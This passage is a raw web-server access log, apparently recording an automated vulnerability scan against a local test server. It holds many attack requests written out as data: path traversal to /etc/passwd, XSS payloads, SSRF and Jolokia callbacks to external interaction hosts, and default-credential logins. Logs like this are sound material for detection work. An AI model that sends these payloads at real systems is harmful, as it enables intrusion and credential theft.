HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.155","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ucmdb-api/connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mongo-express/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seo/seopanel/login.php?sec=forgot HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/woocommerce/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/screens HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://ca28fg0smpvbd3qg07h0jez7dziiu8yzy.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/admin/system.users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"29KD1usc1GB6XrI76b6oA0UEPvs.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"yuzo_related_post_css_and_style=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like 